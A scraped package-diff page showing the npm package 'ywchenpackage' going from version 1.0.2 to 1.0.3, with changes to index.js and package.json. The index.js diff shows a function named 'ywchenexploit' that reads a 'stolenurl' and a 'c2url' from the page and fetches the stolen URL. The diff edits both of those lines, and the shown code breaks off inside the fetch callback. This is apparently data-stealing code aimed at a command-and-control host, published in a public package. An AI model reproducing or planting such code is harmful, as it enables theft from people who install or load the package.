RubyGems
npm
Organizations
Log in
Sign up
npm
ywchenpackage
Versions diffs
1.0.2 → 1.0.3
ywchenpackage 1.0.2 → 1.0.3
Sign up to get
free
protection for your applications and to get access to all the features.
Files changed (2)
hide
show
package/index.js
+2
-2
package/package.json
+1
-1
package/index.js
CHANGED
Viewed
@@ -1,6 +1,6 @@
1
1
function ywchenexploit() {
2
-
let stolenurl = document.stolenurl.
value
;
3
-
let c2url = document.c2url.
value
;
2
+
let stolenurl = document.stolenurl.
url
;
3
+
let c2url = document.c2url.
url
;
4
4
fetch(stolenurl)
5
5
.then(
6
6
function(response){
package/package.json
CHANGED
Viewed
@@ -1,6 +1,6 @@
1
1
{
2
2
"name": "ywchenpackage",
3
-
"version": "1.0.
2
",
3
+
"version": "1.0.
3
",
4
4
"description": "",
5
5
"main": "index.js",
6
6
"scripts": {